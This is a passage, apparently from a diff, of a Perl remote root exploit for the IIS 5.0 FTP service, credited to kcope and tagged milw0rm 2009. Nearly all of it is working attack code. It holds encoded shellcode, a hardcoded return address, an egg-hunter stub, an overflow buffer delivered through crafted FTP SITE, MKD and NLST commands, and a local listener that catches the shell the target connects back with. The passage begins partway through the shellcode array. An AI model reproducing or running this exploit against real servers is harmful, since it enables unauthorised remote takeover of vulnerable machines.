+"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
+"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
+"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
+"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
+"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
+"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
+"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
+"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
+"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
+"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
+"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
+"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
+"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
+"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
+"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
+"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
+"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
+"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
+"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
+"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
+"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
+"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
+"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
+"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";
+
+
+print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
+if ($#ARGV ne 1) {
+print "usage: iiz5.pl \n";
+exit(0);
+}
+srand(time());
+$port = int(rand(31337-1022)) + 1025;
+$locip = $ARGV[1];
+$locip =~ s/\./,/gi;
+if (fork()) {
+$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
+ PeerPort => '21',
+ Proto => 'tcp');
+$patch = "\x7E\xF1\xFA\x7F";
+$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
+
+$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
+# top address of stack frame where shellcode resides, is hardcoded inside this block
+$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
+ ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
+
+# attack buffer
+$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
+ ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
+ "HHHHIIII".
+$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
+$x = <$sock>;
+print $x;
+print $sock "USER anonimoos\r\n";
+$x = <$sock>;
+print $x;
+print $sock "PASS $shell\r\n";
+$x = <$sock>;
+print $x;
+print $sock "USER anonimoos\r\n";
+$x = <$sock>;
+print $x;
+print $sock "PASS $shell\r\n";
+$x = <$sock>;
+print $x;
+
+print $sock "USER anonymous\r\n";
+$x = <$sock>;
+print $x;
+print $sock "PASS anonymous\r\n";
+$x = <$sock>;
+print $x;
+print $sock "MKD w00t$port\r\n";
+$x = <$sock>;
+print $x;
+print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
+$x = <$sock>;
+print $x;
+print $sock "SITE $v\r\n";
+$x = <$sock>;
+print $x;
+print $sock "SITE $v\r\n";
+$x = <$sock>;
+print $x;
+print $sock "SITE $v\r\n";
+$x = <$sock>;
+print $x;
+print $sock "SITE $v\r\n";
+$x = <$sock>;
+print $x;
+print $sock "CWD w00t$port\r\n";
+$x = <$sock>;
+print $x;
+print $sock "MKD CCC". "$c\r\n";
+$x = <$sock>;
+print $x;
+print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
+$x = <$sock>;
+print $x;
+# TRIGGER
+print $sock "NLST $c*/../C*/\r\n";
+$x = <$sock>;
+print $x;
+while (1) {}
+} else {
+my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
+die "Could not create socket: $!\n" unless $servsock;
+my $new_sock = $servsock->accept();
+while(<$new_sock>) {
+print $_;
+}
+close($servsock);
+}
+#Cheerio,
+#
+#Kingcope
+
+# milw0rm.com [2009-09-01]